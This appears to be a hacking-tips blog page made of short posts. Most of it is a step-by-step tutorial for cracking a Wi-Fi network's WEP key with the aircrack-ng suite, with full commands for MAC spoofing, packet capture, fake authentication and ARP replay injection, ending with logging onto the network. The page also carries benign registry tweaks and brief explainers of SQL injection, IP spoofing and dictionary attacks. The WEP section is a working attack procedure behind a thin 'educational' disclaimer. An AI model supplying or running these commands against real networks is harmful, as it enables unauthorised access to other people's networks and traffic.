Crack a Wi-Fi Network’s WEP Password

Today we're going to run down, step-by-step, how to crack a Wi-Fi network with WEP security turned on. But first, a word: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise.

What You'll Need

Unless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:

• A compatible wireless adapter—This is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood security expert, I purchased an Alfa AWUS050NH USB adapter,Image Given Below.

• A BackTrack 3 Live CD. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. (I tried the BackTrack 4 pre-release, and it didn't work as well as BT3. Do yourself a favor and stick with BackTrack 3 for now.)

• A nearby WEP-enabled Wi-Fi network. The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it. The more use it gets while you collect the data you need to run your crack, the better your chances of success.

• Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

Crack That WEP

To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:

airmon-ng

The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

Now it's time to pick your network. Run:

airodump-ng (interface)

To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.



Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). 


Open a new Konsole window in the foreground, and enter this command:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Here the ESSID is the access point's SSID name. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

You're almost there. Now it's time for:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets.  Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack.

Depending on the power of your network  this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:

aircrack-ng -b (bssid) (file name-01.cap)

Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.
If you didn't get enough data, aircrack will fail and tell you to try again with more.

The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.

 

 

Read More

Appear Invisible on Facebook

To start with, once you login to your Facebook account, click on the Friends link on the left panel.
There you will find an option to Edit your friends. Just click on that link. Now, you would be required to create a list just by clicking on Create List. And once you create a list, add as many friends to it as you want.
The reason behind creating this list is that it lets you make yourself invisible to the whole list at once. Now, click on your Facebook chat box. There, you will be able to find that newly created list
Now when you click on that Facebook Chat box, you could find that newly created list. So, you can make yourself invisible to that list by clicking on the green colored button labelled as Go Offline.
This is as simple as that. This is how you can stay invisible on Facebook Chat.

Read More

Multiple Yahoo Messenger in One PC !! :)

For people who manage multiple accounts at the same time (yes I mean you – the one with a separate account for your work stuff, family stuff and naughty stuff), the time has come for you to use ALL your accounts at the same time!


Behold the simplest method that you can use to enable you to log-in simultaneously with your multiple yahoo accounts! See the video I have attached or follow the simple hack that needs 5 steps.

1. Click on Start Menu
2. Click Run
3. Type “regedit” without the quotes, press Enter
4. Navigate to and expand the following in the said order: HKEY_CURRENT_USER/Software/Yahoo/pager/Test
5. Right-click on Test and create a new DWORD value (32 bit).
6. Rename that value as “Plural” without the quotes.
7. Set the value of “Plural” to 1.

Its done!!
Now close registry and restart yahoo messenger and try Multiple Login :)

Read More

SQL Injection Attacks

These attacks occur when the hacker uses specially crafted SQL questions or commands to execute malicious activities on the victim system. This weakness exists when there is no validation of input when a database query is made via the Internet. The worst thing is that SQL attacks, like most other input validation attacks, can be executed easily through a browser. Most Web sites on the Net rely heavily on the safety of their online database information. Naturally, any breath in their security would lead to damage in the form of financial loss, customer dissatisfaction, or possible law suits etc.

Obviously, the first step for a SQL injection attack is to find a vulnerable target. Attackers would be on the alert for online, forms, such as login prompts, search enquiries, guest books, feedback forms, and so on, through which users submit data to the remote system. Another potential target would be any reference to dynamic pages or scripts, like ASP, PHP, CGI, and their like. The following HTML code is a vulnerable target for a SQL injection attack because it lets the user submit information and also refers to an ASP file:
<form action="script/login.asp" method="post" name="LoginForm">
<input value="text" name="username" value="username"></input>
<input value="password"= name="password" value="password"></password>
</form>

Uncovering illegitimate records, bypassing security features and carrying our malicious codes on the remote victim system are all possible for an attacker who has located a vulnerable SQL server. The most common examples, of SQL injection attacks are examined in the following sections. It should always be kept in mind, however, that there are a larger number of such attacks.

Read More

What is an IP address?

Like in the real world, everyone has an individual home address or telephone number to enable easy access. Similarly, all computers connected to the Internet are given a unique Internet Protocol or IP address that can be used to contact that particular computer. In geek language, an IP address is a decimal notation that divides a 32-bit  Internet addresses into four 8-bit fields.

  

Read More

IP Spoofing

IP Spoofing is probably the ultimate trick or attack that an attacker can execute ton the target system. Almost all wannabe computer experts dream of being able to spoof their IP address and fool the target system into establishing illegitimate connections. If successfully executed, IP spoofing is definitely one of the most smooth and classic attacks on the Internet. However, IP spoofing attacks are quite complex and very few attackers have actually been able to spoof their identity successfully. IP Spoofing is a process wherein an attacker fools or tricks the target system into believing that the data packets being sent actually originated on a system other than the real source system. In other words, IP spoofing is a technique that allows an attacker to change or disguise his real identity while communicating with the target system. In this technique, the data packets that the attacker sends to the system will seem to originate at some other arbitrary system.

Read More

Dictionary Attacks(Password Cracking Attack)

Dictionary attacks are an example of a hit and trial password-cracking technique that is commonly used by attackers. In this password-cracking technique, the attacker uses an automatic tool that tries all words that appear in the dictionary as the victim's password. As soon as a particular word matches the victim's password, the automated tool displays it on the screen. In other words, all dictionary words are tried as the password and if a word matches, it is then displayed on the screen as the password of the victim. One of the biggest problems with this type of an attack is that it takes up a lot of system resources and is relatively quite slow. Morever, this password cracking technique is rendered useless if the victim's password is not a word that appears in the dictionary.

Read More

Locking CD-ROM Drives

(For Windows 2000, XP and NT)
      Similar to the above example, it is also possible to lock access to the CD-ROM drive by the following steps:

1. Open the regedit.exe file.
2. Search for the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT  \CurrentVersion\Winlogon
3. Create a new string entry named AllocateCDRoms and set its data value to 1 to ensure that only the  local   logged on user can access the CD-ROM drive. On the other hand, if the string entry's    data value is set to 0 then all restrictions are lifted.
4. Exit the Windows registry. You might have to restart the Windows session for the changes to come into effect.

   
         It is also possible to implement the above by simply creating    and executing a file with a .reg extension containing the    undermentioned data:

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]
"AllocateCDRoms"="1"

Read More